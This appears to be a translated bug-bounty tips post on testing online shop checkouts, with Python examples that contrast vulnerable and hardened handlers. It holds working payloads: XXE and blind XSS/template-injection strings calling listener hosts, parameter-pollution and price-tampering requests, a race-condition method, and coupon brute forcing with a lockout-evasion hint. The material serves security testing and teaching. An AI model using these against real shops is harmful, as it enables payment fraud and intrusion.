OnlineShoop Bug Bounty

Hello, below I show some TIPS that can be used when practicing Bug Bounty.

All these entries belong to the author @0xAwali. We have only translated them into Spanish, summarized some parts, and added in other places references and explanations that are not in the original article.

#OnlineShoopBountie TIP #1 Try to manipulate the quantity. Example: if the original quantity is 1, try changing it to 3 in a later request of the flow; if the total is not recalculated server-side, you get two extra items for free.

#OnlineShoopBountie TIP #2 Try to manipulate the price. Example: if the original price is 10, try changing it to -10 or to a fractional value such as 0.10 to get the item for (almost) nothing.

#OnlineShoopBountie TIP #3 Try to manipulate the currency. If the original currency is the dollar, try changing it to INR (or MXN) while keeping the same numeric amount, so that you pay 10 rupees or pesos instead of 10 dollars.

#OnlineShoopBountie TIP #4 Try negative numbers, zero, NaN, null, or a string of zeros (00000) as parameter values. Example: quantity=0000 or quantity=null to cause logic errors.

#OnlineShoopBountie TIP #5 Try the HTTP Parameter Pollution technique. Example: quantity=1&quantity=2 (the same parameter repeated), or quantity=[] with every parameter, to get free items. Frameworks differ on which copy of a repeated parameter they read (first, last, or all of them joined), so the validation step and the fulfilment step may end up seeing different values.

#OnlineShoopBountie TIP #6 Remove parameters entirely, or set them to null, to cause logic errors.
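As an added example (not code from the original post or from @0xAwali), here is a toy order handler that trusts the client exactly the way tips 1 to 6 exploit, next to a hardened handler that looks the price up server-side and rejects the manipulated values. The catalogue, exchange rates, limits and request bodies are constructed for the demo; `amount` stands in for whatever price-like parameter the real shop sends.

```python
"""Added example, not code from the original post: a toy order handler that
trusts the client the way tips 1 to 6 exploit, next to a hardened handler that
looks prices up server-side and rejects the manipulated values. The catalogue,
exchange rates and limits are constructed for the demo."""
import re
from decimal import Decimal

CATALOGUE = {"sku-1": Decimal("10.00")}          # real price, in USD
RATES = {"USD": Decimal("1"), "INR": Decimal("0.012"), "MXN": Decimal("0.05")}
QTY_RE = re.compile(r"[1-9][0-9]{0,2}")        # 1..999: no sign, NaN, null or 0000


class Rejected(ValueError):
    pass


def vulnerable_order(form):
    """Returns (items_to_ship, amount_to_charge, currency) straight from the
    request. A repeated parameter (HPP) arrives as a list and, as in several
    frameworks, the last value wins."""
    def last(v):
        return v[-1] if isinstance(v, list) else v
    qty = float(last(form.get("quantity", "1")))
    amount = float(last(form.get("amount", "0")))     # client-chosen price
    return qty, amount, last(form.get("currency", "USD"))


def hardened_order(form):
    """Quantity must be one plain integer in range, the SKU must exist, the
    currency must be allowlisted, and the amount is derived from the catalogue;
    the client's "amount" is never read."""
    qty_raw = form.get("quantity")
    if not isinstance(qty_raw, str) or not QTY_RE.fullmatch(qty_raw):
        raise Rejected("quantity must be a single integer 1..999")
    sku = form.get("sku")
    if not isinstance(sku, str) or sku not in CATALOGUE:
        raise Rejected("unknown sku")
    currency = form.get("currency", "USD")
    if not isinstance(currency, str) or currency not in RATES:
        raise Rejected("unsupported currency")
    qty = int(qty_raw)
    amount = (CATALOGUE[sku] * qty / RATES[currency]).quantize(Decimal("0.01"))
    return qty, amount, currency


BASE = {"sku": "sku-1", "quantity": "1", "amount": "10", "currency": "USD"}

# Constructed request bodies, one per tip above.
ATTACKS = {
    "tip1_quantity": {**BASE, "quantity": "3"},           # amount still 10
    "tip2_negative": {**BASE, "amount": "-10"},
    "tip2_fraction": {**BASE, "amount": "0.10"},
    "tip3_currency": {**BASE, "currency": "INR"},        # 10 INR, not 10 USD
    "tip4_nan":      {**BASE, "quantity": "NaN"},
    "tip4_zeros":    {**BASE, "quantity": "0000"},
    "tip5_hpp":      {**BASE, "quantity": ["1", "3"]},   # quantity=1&quantity=3
    "tip6_missing":  {k: v for k, v in BASE.items() if k != "amount"},
}


def outcome(handler, form):
    """Run one handler on one body; a rejection comes back as its message."""
    try:
        return handler(form)
    except Rejected as e:
        return f"rejected: {e}"


if __name__ == "__main__":
    for name, body in ATTACKS.items():
        print(f"{name:15} vulnerable={outcome(vulnerable_order, body)}"
              f"  hardened={outcome(hardened_order, body)}")
```

The hardened version does three things the tips depend on being absent: it ignores every price-like value the client sends, it accepts the quantity only as a single plain integer (which kills NaN, null, negatives, zero padding and the repeated-parameter trick in one check), and it converts the server-side price into the requested currency instead of reinterpreting the client's number.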

#OnlineShoopBountie TIP #7 Try to force the content type from JSON to XML (Content-Type: application/xml) to perform XXE attacks: <!DOCTYPE test [<!ENTITY xxe SYSTEM "http://me.com/xxe.dtd">]>. Reference the entity (&xxe;) in one of the fields; a request for xxe.dtd arriving at your server confirms that the parser resolves external entities.

#OnlineShoopBountie TIP #8 Inject XSS payloads such as "><svg> or blind XSS "><img src="//me.xss.ht"> in all the parameters of the purchase.

#OnlineShoopBountie TIP #9 Inject blind XSS or blind template injection payloads into the User-Agent or into headers like X-Forwarded-For that the application takes as the user's IP. Example: {{constructor.constructor('import("http://me.xss.ht")')()}}. These values are often stored and rendered later in logs, fraud dashboards or admin panels, so the callback may arrive long after the purchase.

#OnlineShoopBountie TIP #10 Inject the characters %00 and %FF into all purchase parameter values to cause intentional errors that may expose sensitive information.

#OnlineShoopBountie TIP #11 Insert very long strings or numbers into all parameter values. Example: quantity=1000000000000000000000000000000000000000000000000000 to cause errors (integer overflow, unhandled exceptions) that may expose sensitive information.
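Tips 7 to 11 all come down to replaying the captured purchase request with one parameter at a time swapped for a payload. As an added example (not code from the original post or from @0xAwali), the script below builds that test matrix from a constructed capture, tags each blind payload with the field name so a callback tells you which parameter was rendered, and re-encodes a JSON body as XML with the tip 7 DOCTYPE. The capture, the listener domain `me.xss.ht` and the DTD URL are placeholders; the generated bodies are meant to be fed to a proxy or Intruder, nothing is sent here.

```python
"""Added example, not code from the original post: generate the one-mutation-
at-a-time test cases that tips 7 to 11 describe from a captured checkout
request. Request, canary host and DTD URL are constructed placeholders."""
import copy
import json
from xml.sax.saxutils import escape

CANARY_HOST = "me.xss.ht"       # assumption: your blind-XSS / OOB listener

# Constructed capture of the purchase request (parsed form parameters and
# the headers tip 9 singles out).
CAPTURED = {"sku": "sku-1", "quantity": "1", "price": "10.00",
            "currency": "USD", "coupon": ""}
CAPTURED_HEADERS = {"User-Agent": "Mozilla/5.0", "X-Forwarded-For": "203.0.113.5"}


def payloads(field):
    """Payload classes from tips 8 to 11. Blind ones embed the field name as a
    subdomain (needs wildcard DNS on the listener) so the callback identifies
    the parameter that was rendered."""
    tag = f"{field}.{CANARY_HOST}"
    return {
        "xss_probe": '"><svg>',
        "blind_xss": f'"><img src="//{tag}">',
        "blind_ssti": "{{constructor.constructor('import(\"http://%s\")')()}}" % tag,
        "null_byte": "%00",      # keep percent-encoded so the server decodes a NUL
        "high_byte": "%FF",
        "long_number": "1" + "0" * 60,
        "long_string": "A" * 4096,
    }


def mutate(params):
    """Yield (field, payload_name, mutated_copy): exactly one field changes per
    case so that a crash, stack trace or callback is attributable."""
    for field in params:
        for name, value in payloads(field).items():
            case = copy.deepcopy(params)
            case[field] = value
            yield field, name, case


def xxe_body(json_text, dtd_url, target_field):
    """Tip 7: re-encode a JSON object as XML (root element and key names are
    assumed to be valid XML names), declare the external entity and reference
    it in one field. Send with Content-Type: application/xml."""
    obj = json.loads(json_text)
    parts = [f'<!DOCTYPE order [<!ENTITY xxe SYSTEM "{dtd_url}">]>', "<order>"]
    for key, value in obj.items():
        text = "&xxe;" if key == target_field else escape(str(value))
        parts.append(f"<{key}>{text}</{key}>")
    parts.append("</order>")
    return "".join(parts)


if __name__ == "__main__":
    for field, name, case in mutate(CAPTURED):
        print(f"{field:10} {name:12} {case[field][:40]!r}")
    for field, name, case in mutate(CAPTURED_HEADERS):
        print(f"{field:16} {name:12} {case[field][:40]!r}")
    print(xxe_body(json.dumps(CAPTURED), "http://me.com/xxe.dtd", "coupon"))
```

Two practical notes: the `%00` and `%FF` strings must reach the wire exactly as written, so send the raw body yourself rather than through a client that re-encodes `%` as `%25`; and the same `mutate()` works on the header dictionary, which is how tip 9 gets covered by the same run.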

#OnlineShoopBountie TIP #12 If the application transfers funds or credit from account A to account B, try a race condition. Steps to reproduce: 1. Intercept the transfer HTTP request with a proxy tool such as Burp Suite. 2. Send the request to Turbo Intruder to fire many copies concurrently. Note: you can also attempt this in Burp Suite's Intruder module with multiple threads, but Turbo Intruder can gate the requests so they hit the server within a much tighter window, which makes the race far easier to win.

Manual: https://krevetk0.medium.com/how-to-check-race-conditions-in-web-applications-338f73937992
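As an added example (not code from the original post, from @0xAwali, or from the linked manual), the race tip 12 targets, simulated locally: a check-then-debit transfer with nothing tying the two steps together, next to one where the check and the debit are a single critical section. A `threading.Barrier` stands in for the tight burst that Turbo Intruder produces, parking every worker between the check and the debit so the outcome is deterministic.

```python
"""Added example, not code from the original post: the balance race that
tip 12 describes, reproduced with threads. Twenty transfers of the whole
balance are released at once; the unprotected version lets every one of
them through, the locked version lets exactly one through."""
import threading
from decimal import Decimal


class Account:
    def __init__(self, balance):
        self.balance = Decimal(balance)
        self.lock = threading.Lock()


def transfer_racy(src, dst, amount, sync):
    """Check, then debit, with nothing in between. `sync` is a Barrier that
    holds every worker after the check has passed, which is the interleaving
    a burst of concurrent requests produces on a real server."""
    if src.balance < amount:
        return False
    sync.wait()                  # all workers have passed the check by now
    src.balance -= amount
    dst.balance += amount
    return True


def transfer_locked(src, dst, amount, sync):
    """Check and debit inside one critical section. In a database this is
    SELECT ... FOR UPDATE, or a conditional UPDATE ... WHERE balance >= amount;
    the barrier only aligns the start so the workers still arrive together."""
    sync.wait()
    with src.lock:
        if src.balance < amount:
            return False
        src.balance -= amount
        dst.balance += amount
        return True


def run(transfer, workers=20, balance="100", amount="100"):
    """Fire `workers` identical transfers concurrently and return
    (successful_transfers, final_source_balance)."""
    src, dst = Account(balance), Account("0")
    sync = threading.Barrier(workers)
    results = []

    def worker():
        results.append(transfer(src, dst, Decimal(amount), sync))

    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results), src.balance


if __name__ == "__main__":
    print("racy  :", run(transfer_racy))     # 20 transfers succeed, balance -1900
    print("locked:", run(transfer_locked))   # 1 transfer succeeds, balance 0
```

The thing to look for in a real target is the same: send N copies of a transfer that each spend the full balance and compare the number of accepted responses with the balance afterwards. Any difference means the check and the debit are not atomic.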

#OnlineShoopBountie TIP #13 Check the different steps and flows of the purchase process. If the application runs the checkout first and then, in a separate request, the purchase confirmation at the end, try skipping the steps in between: replay only the HTTP request that performs the confirmation and see whether the order completes without any payment. The underlying bug is a confirmation endpoint that does not verify the order's state server-side before completing it.
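As an added example (not code from the original post or from @0xAwali), here is the step-skipping bug from tip 13 in miniature: a confirmation endpoint that only checks the order exists, beside one that requires the order to have reached the paid state with the full amount recorded. The order store, state names and amounts are constructed for the demo.

```python
"""Added example, not code from the original post: a three-step order flow
(checkout -> payment -> confirmation) where the confirmation step can be
replayed on its own. States and storage are made up for the demo."""
from enum import Enum


class State(Enum):
    CART = "cart"
    PAID = "paid"
    CONFIRMED = "confirmed"


class Shop:
    def __init__(self):
        self.orders = {}

    def checkout(self, order_id, amount):
        """Step 1: create the order with nothing paid yet."""
        self.orders[order_id] = {"state": State.CART, "amount": amount, "paid": 0}

    def payment_webhook(self, order_id, amount):
        """Step 2: normally reached only when the payment provider reports
        a successful charge."""
        order = self.orders[order_id]
        if amount >= order["amount"]:
            order["paid"] = amount
            order["state"] = State.PAID

    def confirm_vulnerable(self, order_id):
        """Step 3 as tip 13 describes it: if the order exists, it is confirmed."""
        order = self.orders[order_id]
        order["state"] = State.CONFIRMED
        return True

    def confirm_hardened(self, order_id):
        """Step 3 done properly: the order must already be PAID and the paid
        amount is re-checked against the order total."""
        order = self.orders[order_id]
        if order["state"] is not State.PAID or order["paid"] < order["amount"]:
            return False
        order["state"] = State.CONFIRMED
        return True


def skip_payment(confirm):
    """Replay only the confirmation request straight after checkout.
    Returns (confirmation_accepted, resulting_state)."""
    shop = Shop()
    shop.checkout("ord-1", 50)
    ok = confirm(shop, "ord-1")
    return ok, shop.orders["ord-1"]["state"].value


def pay_then_confirm(confirm):
    """The legitimate flow, to show the hardened check still lets it through."""
    shop = Shop()
    shop.checkout("ord-1", 50)
    shop.payment_webhook("ord-1", 50)
    ok = confirm(shop, "ord-1")
    return ok, shop.orders["ord-1"]["state"].value


if __name__ == "__main__":
    print("skip payment, vulnerable:", skip_payment(Shop.confirm_vulnerable))
    print("skip payment, hardened  :", skip_payment(Shop.confirm_hardened))
    print("pay first, hardened     :", pay_then_confirm(Shop.confirm_hardened))
```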

#OnlineShoopBountie TIP #14 If the application handles discount coupons, check whether they can be discovered by brute force. If the coupon consists only of digits (no letters or symbols) and is short, you will almost certainly find a valid one with a brute-force attack from a Python script or Burp Suite's Intruder module. Also check whether the redemption endpoint rate-limits or locks out after repeated failures; if it does not, the keyspace is the only thing protecting the coupons.

Manuals: https://portswigger.net/burp/documentation/desktop/tools/intruder/payloads/types https://portswigger.net/burp/documentation/desktop/tutorials/brute-forcing-a-login-using-burp-intruder
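As an added example (not code from the original post, from @0xAwali, or from the linked Burp manuals), the script below shows why the short all-digit coupon from tip 14 falls to brute force and what stops it. It enumerates the keyspace the way Intruder's brute forcer does against a constructed coupon endpoint, once with unlimited guesses and once with a failure lockout; the valid coupon, alphabet and limits are made up.

```python
"""Added example, not code from the original post: brute-forcing a coupon
against a constructed endpoint, with and without a failure lockout, plus the
keyspace arithmetic behind tip 14."""
import itertools
import string

DIGITS = string.digits
ALNUM = string.digits + string.ascii_uppercase


def keyspace(alphabet_size, length):
    """Number of candidate codes for a coupon format."""
    return alphabet_size ** length


def seconds_to_exhaust(alphabet_size, length, requests_per_second):
    """Worst-case time to try every code at a given request rate."""
    return keyspace(alphabet_size, length) / requests_per_second


class CouponEndpoint:
    """Stand-in for the shop's redeem endpoint. With max_failures=None it
    accepts unlimited guesses; otherwise it locks after that many failures."""

    def __init__(self, valid, max_failures=None):
        self.valid, self.max_failures = valid, max_failures
        self.failures, self.locked = 0, False

    def redeem(self, code):
        if self.locked:
            return "locked"
        if code == self.valid:
            return "ok"
        self.failures += 1
        if self.max_failures is not None and self.failures >= self.max_failures:
            self.locked = True
        return "invalid"


def brute_force(endpoint, alphabet, length):
    """Try every code of the given alphabet and length in order, as
    Intruder's brute forcer payload type does. Returns (code_or_None, attempts)."""
    attempts = 0
    for combo in itertools.product(alphabet, repeat=length):
        attempts += 1
        reply = endpoint.redeem("".join(combo))
        if reply == "ok":
            return "".join(combo), attempts
        if reply == "locked":
            return None, attempts
    return None, attempts


if __name__ == "__main__":
    print("4 digits:", keyspace(10, 4), "codes,",
          seconds_to_exhaust(10, 4, 50), "s at 50 req/s")
    print("8 alnum :", keyspace(36, 8), "codes,",
          seconds_to_exhaust(36, 8, 50) / 86400 / 365, "years at 50 req/s")
    print("open    :", brute_force(CouponEndpoint("7342"), DIGITS, 4))
    print("lockout :", brute_force(CouponEndpoint("7342", max_failures=10), DIGITS, 4))
```

Note that a lockout keyed on the session or account is easy to sidestep by starting a fresh session per batch, so when you test a real target, check whether the limit is tied to the coupon, the IP, or nothing at all.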
